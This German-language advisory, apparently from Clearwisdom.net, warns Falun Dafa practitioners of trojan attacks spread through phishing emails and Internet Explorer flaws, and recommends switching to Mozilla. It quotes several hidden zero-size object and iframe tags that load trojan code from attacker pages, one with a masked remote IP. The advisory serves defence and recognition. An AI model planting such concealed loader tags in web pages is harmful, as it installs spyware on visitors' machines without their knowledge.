Microsoft Internet Explorer (IE) hat viele Sicherheitslücken, daher ist es empfehlenswert, dass alle einen anderen Internetbrowser verwenden

(Clearwisdom.net) Bei den jüngsten Computervirusangriffen auf Überseepraktizierende zogen die Angreifer hauptsächlich Vorteile aus den Sicherheitslücken des Microsoft Internet Explorer (IE). Wir empfehlen, dass alle einen anderen Internetbrowser verwenden, und diesen als den Default-Browser bestimmen. Dies würde das Sicherheitsrisiko beträchtlich verringern. Besonders bei Praktizierenden, denen nicht vertraut ist, welches Programm den Zugang zum Internet durch die Feuermauer ermöglicht, sollte der Ersatz des Browsers so bald wie möglich erfolgen.

In diesem Artikel sprechen wir mehr über die Computersicherheit, insbesondere im Bereich der Sicherheitslücken des IE.

In den vergangenen Jahren fanden Computerangriffe gegen Dafa Praktizierende in folgender Reihenordnung statt:

  1. Angriffe auf Übersee-Dafa-Websites direkt vom Festland China aus;

  2. Angriffe auf Übersee-Dafa-Websites durch Proxies in Übersee;

  3. Angriffe auf das Netz der Regierung der Vereinigten Staaten unter Verwendung von falschen Dafa-Site-Identitäten;

  4. Aufstellen von falscher Proxy, um Praktizierende auf dem Festland China in die Falle zu locken;

  5. Verbreiten von Viren durch Emails der Praktizierenden. Es handelt sich hauptsächlich um bekannte Viren, die momentan im Netz verbreitet sind;

  6. Ausspionieren der Email-Kommunikation unter Praktizierenden, Nachahmen des Stils, und Versand von Emails, die im Anhang Viren enthalten.


Da die Praktizierenden sich der Computersicherheit immer mehr bewusst werden, und insbesondere beim Öffnen der Anhänge Vorsicht walten lassen, sind diese Tricks wirkungslos geworden. Deswegen sind sie auf trojanische Viren umgestiegen, um die Computeraktivitäten von Praktizierenden zu überwachen.

Ein „Trojaner" ist ein Programm, das ohne Kenntnis des Benutzers in den Computer installiert wird. Das Programm startet automatisch, wann immer der Computer eingeschaltet wird. Im Hintergrund überwacht es Tastaturanschläge und notiert jegliche Kontonamen, Kennwörter und Adressbucheintragungen. Es scannt auch alle Dokumente ab und stiehlt daraus nützliche Informationen. Dann übermittelt es diese Informationen an eine rechnerferne Maschine.

In der Vergangenheit war das Installieren der Trojaner nicht einfach. Es erforderte vom Benutzer, ein Programm zum Laufen zu bringen (wie z.B. das Öffnen eines Emailanhangs). Aber jetzt, durch die Sicherheitslücken des IE, können Trojaner bereits installiert werden, indem man einfach eine Webseite besucht. Das Böse nutzt diese Sicherheitslücken sofort aus.

Ihre Angriffe haben folgende Eigenschaften:


  1. Inhalt:

    Die Email täuscht vor, Informationen über die Wahrheitserklärung zu enthalten, wie z.B.: „Großer Prozess" oder „Die Wahrheit auf unterschiedliche Weise erklären". Sie kann etwas beinhalten, das die Neugier der Leute zu erwecken versucht, wie „UFO erscheint beim Raketenstart”. Es kann über interne Nachrichten berichten, wie dieser und jener Festlandpraktizierende wird festgehalten.


  2. Link von Webseiten

    Um einen Trojaner zu installieren reicht es nicht aus, die Email einfach zu lesen; man muss noch eine Webseite besuchen. In der Email steht häufig: "Klicken Sie bitte hier, um die neuesten Informationen zu erfahren". Dieses URL führt zu einer Webseite, in der sich der trojanische Code befindet. Es nutzt hauptsächlich die Sicherheitslücke des im IE eingebetteten Objektmerkmals aus. Wenn man den Netzquellencode (VIEW SOURCE) öffnet, sollte man einen Code wie diesen sehen:

    object data="lhxyexe.asp" height=0 width=0
    object data="lhxyhta.asp" height=0 width=0

    oder der Code wird so herum aufgewickelt:

    iframe src="mm.html" name="id" width="0" height="0" frameborder="0"
    wo der Code in "mm.html" gespeichert ist.

    Das Geheimnis ist "width=0 height=0". Diese Einstellungen bewirken, dass der Gegenstand nicht auf der Webseite angezeigt wird.


  3. HTML Anhang

    Der folgende, fortschrittlichere Trick benutzt einen HTML-Anhang, den Leute normalerweise nicht verdächtigen. Jedoch enthält dieser HTML-Anhang den trojanischen Objektcode. In diesem Fall muss es das komplette URL benutzen:
    object data="http://xxx.xxx.xxx.xxx/lhxyexe.asp" height=0 width=0>
    cken.


  4. Den Server des trojanischen Codes nach Übersee bringen

    Am Anfang befand sich der trojanische Code auf Webseiten, deren Basis in China lag. Wir haben solche Server in Shanghai, in Shandong, usw., gefunden. Sie benutzen auch einige bekannte chinesische Webseiten, um dessen Benutzer an ihre eigenen Server weiterzuleiten. Z.B. kann er die Net Ease Webseite http://abckdkd.nease.net verwenden. Die Net Ease Webseite bietet einen Dienst an, durch den der Domänenname weitergeleitet wird; so wird der Nutzer zum Server mit dem trojanischen Code weitergeleitet.

    Mit einer installierten Firewall muss man sehr vorsichtig sein, wenn der Computer versucht, ohne Anlass eine chinesische IP Adresse zu besuchen. Kürzlich haben sie Webseiten außerhalb Chinas errichtet. Wir haben vor kurzem eine in den Vereinigten Staaten und eine in Ostasien gefunden.



Wie können wir uns schützen?

Die Antwort ist ziemlich einfach. Bis jetzt sind alle diese Tricks auf die Sicherheitslücken des IE ausgerichtet. Andere gute Internet-Browser sind Mozilla oder Netscape. Die Installation von Mozilla ist simpel, bitte einfach www.mozilla.com besuchen.

Der Schlüsselpunkt ist, daß Mozilla als Defaultbrowser im Computer eingestellt werden muss. Wenn man dann ein URL in einer Email anklickt, ist das geöffnete Fenster auf Mozilla anstatt auf IE basiert.

Mozilla wird von manchen Multimedia-Webseiten nicht gut unterstützt. Wenn man in solchen Fällen sicher ist, dass die Webseite zuverlässig ist, kann man den IE benutzen.

Kurz gesagt ist es zur Zeit das Beste, den Gebrauch des IE einzustellen, um Trojaner zu vermeiden. Bitte schenkt dieser Angelegenheit besondere Beachtung.